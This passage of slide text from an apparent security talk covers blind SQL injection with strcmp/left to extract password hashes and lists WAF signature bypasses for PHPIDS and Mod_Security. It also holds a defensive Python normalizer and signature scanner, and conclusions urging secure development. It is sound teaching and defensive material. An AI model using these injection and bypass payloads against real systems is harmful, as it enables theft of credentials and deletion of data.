    The given example is valid for all WAFs whose developers aim to cover as many web applications as possible


    52/62

    Practice of Bypassing WAF: Blind SQL Injection

    Known:

    substring((select 'password'),1,1) = 0x70

    substr((select 'password'),1,1) = 0x70

    mid((select 'password'),1,1) = 0x70

    New:

    strcmp(left('password',1), 0x69) = 1

    strcmp(left('password',1), 0x70) = 0

    strcmp(left('password',1), 0x71) = -1

    STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first argument is smaller than the second one, and 1 otherwise

    http://dev.mysql.com/doc/refman/5.0/en/string-comparison-functions.html


    53/62

    Practice of Bypassing WAF: Blind SQL Injection

    Blind SQL Injection doesn't always imply the use of AND/OR!

    Vulnerable code examples

    Query("select * from table where uid=".$_GET['uid']);

    Query("select * from table where card=".$_GET['card']);

    Exploitation examples

    false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)%2B112233

    false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x61)%2B112233

    true: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x62)%2B112233

    first hash character = B

    false: ...

    false: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6240)%2B112233

    true: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6241)%2B112233

    second hash character = A


    54/62

    Practice of Bypassing WAF: SQL Injection Signature Bypass

    PHPIDS (0.6.1.1) default rules

    Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1

    But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1

    Forbid: /?id=1+OR+1=1

    But allows: /?id=1+OR+0x50=0x50

    Forbid: /?id=substring((1),1,1)

    But allows: /?id=mid((1),1,1)


    55/62

    Practice of Bypassing WAF: SQL Injection Signature Bypass

    Mod_Security (2.5.9) default rules

    Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74

    But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

    Forbid: /?id=1+OR+1=1

    But allows: /?id=1+OR+0x50=0x50

    Forbid: /?id=1+and+5=6

    But allows: /?id=1+and+5!=6

    Forbid: /?id=1;drop members

    But allows: /?id=1;delete members

    And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
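The WAF slide (42) describes a pipeline of normalization followed by signature search, and the HPP/HPF and signature-bypass slides (46-55) show the forms that slip past a pipeline that looks at each parameter value in isolation. The following is an added example, not code from the slides or from PHPIDS or Mod_Security: a small normalizer and signature matcher in that shape, extended with the synonym folding, the comment stripping and the duplicate-parameter joins those slides motivate, run over constructed request lines. The signature names, the "GET <path>" line format and the sample requests are constructed for this illustration.

```python
"""Request normalization and signature search in the shape the WAF slide
describes (decode, drop comments and null bytes, collapse whitespace, map
function synonyms, then match), with the HPP/HPF joins from slides 46-50.
Added example, not from the slides or any product; signature names, the
'GET <path>' line format and the sample requests are constructed."""
import re
from urllib.parse import unquote_plus

# Function synonyms listed on the slides, folded to one canonical spelling.
SYNONYMS = {
    "mid": "substring", "substr": "substring", "lcase": "lower",
    "ucase": "upper", "rlike": "regexp", "char_length": "character_length",
    "position": "locate",
}
_SYN_RE = re.compile(r"\b(" + "|".join(SYNONYMS) + r")\s*\(")

SIGNATURES = {
    "union-select": re.compile(r"union[\s(]*select"),
    "select-from": re.compile(r"select.+from"),
    "stacked-query": re.compile(r";\s*(select|insert|update|delete|drop|exec)\b"),
    # 1=1, 0x50=0x50, 5!=6: a comparison with a literal on both sides.
    "constant-compare": re.compile(
        r"\b(or|and)\s*\(?\s*(0x[0-9a-f]+|\d+)\s*(=|!=|<>|<|>)\s*(0x[0-9a-f]+|\d+)"),
    # substring()/strcmp()/left()/ascii() wrapped around a subquery: blind extraction.
    "blind-oracle": re.compile(r"\b(substring|strcmp|left|ascii|hex|bin)\s*\(.*\(\s*select\b"),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\("),
}


def normalize(value):
    """Canonical form of one decoded parameter value."""
    s = value.replace("\x00", "")                     # never let a null byte end the check
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.DOTALL)  # un/**/ion -> union
    s = re.sub(r"\s+", " ", s).strip().lower()
    return _SYN_RE.sub(lambda m: SYNONYMS[m.group(1)] + "(", s)


def parse_query(target):
    """Split '?a=1&b=2' into decoded (name, value) pairs, keeping duplicates."""
    pairs = []
    for part in target.partition("?")[2].split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyze(request_line):
    """Sorted finding names for one constructed 'GET <path>' line."""
    target = request_line.split(" ", 1)[1] if request_line.startswith("GET ") else request_line
    pairs = parse_query(target)
    findings = set()
    by_name = {}
    for name, value in pairs:
        by_name.setdefault(name, []).append(value)
    if any(len(vs) > 1 for vs in by_name.values()):
        findings.add("duplicate-param")                 # HPP indicator
    candidates = [value for _, value in pairs]          # each value on its own
    candidates += [",".join(vs) for vs in by_name.values() if len(vs) > 1]  # ASP-style join (HPP)
    candidates.append(" ".join(value for _, value in pairs))  # values spliced into one statement (HPF)
    for candidate in candidates:
        norm = normalize(candidate)
        findings.update(name for name, rx in SIGNATURES.items() if rx.search(norm))
    return sorted(findings)


# Constructed sample requests: two benign, then bypass forms from the slides.
SAMPLE_REQUESTS = [
    "GET /?id=6329&print=Y",
    "GET /?q=union+station",
    "GET /?id=1+un/**/ion+sel/**/ect+1,2,3--",
    "GET /?id=1+OR+0x50=0x50",
    "GET /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74",
    "GET /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users",
    "GET /?a=1+union/*&b=*/select+1,2",
    "GET /?id=1;delete+members",
    "GET /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')",
]


def scan(lines):
    """Map each request line to its findings (empty list = nothing matched)."""
    return {line: analyze(line) for line in lines}


if __name__ == "__main__":
    for line, found in scan(SAMPLE_REQUESTS).items():
        print(f"{found or '-'}\t{line}")
```

Two things in the output are worth noticing: the HPP and HPF lines are flagged only because the joined candidates are checked, not the individual values, and the last line is flagged only by the stacked-query rule, since 'sel'+'ect' never becomes the word select at the HTTP layer. That residue is the point the Conclusions slide makes: a signature layer narrows the attack vector but cannot stand in for fixing the query construction.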


    56/62

    Conclusions


    57/62

    SQL Injection in wildlife

    SQL Injection can be found even in widely known and large Internet resources


    58/62

    Conclusions

    SQL Injection is a gross programming error, which is widespread and very dangerous

    WAF is not the long-expected silver bullet

    WAF doesn't eliminate a vulnerability, it just partly screens the attack vector

    Conceptual problems of WAFs built on the signature principle

    A correctly organized Software Development Life Cycle (SDLC) considerably reduces the probability that a vulnerability will appear in program code

    Web application protection (and information security as a whole) must be comprehensive :)


    59/62

    Automated Exploitation of SQL Injection

    sqlmap (http://sqlmap.sourceforge.net/). Full support: MySQL, Oracle, PostgreSQL, Microsoft SQL Server. Partial support: Microsoft Access, DB2, Informix, Sybase, Interbase

    sqlsus (http://sqlsus.sourceforge.net/). Only MySQL support is implemented

    bsqlbf-v2 (http://code.google.com/p/bsqlbf-v2/). It is no longer limited to Blind SQL Injection. The following systems are supported: MySQL, Oracle, PostgreSQL, and Microsoft SQL Server

    In view of the development of new fast techniques of Blind SQL Injection exploitation in MySQL, they are going to release a corresponding proof of concept (it will be available on http://www.milw0rm.com/papers/)


    60/62

    Automatic detection of SQL Injection


    61/62


    62/62

    Thank you for your attention!

    [email protected]
    http://devteev.blogspot.com/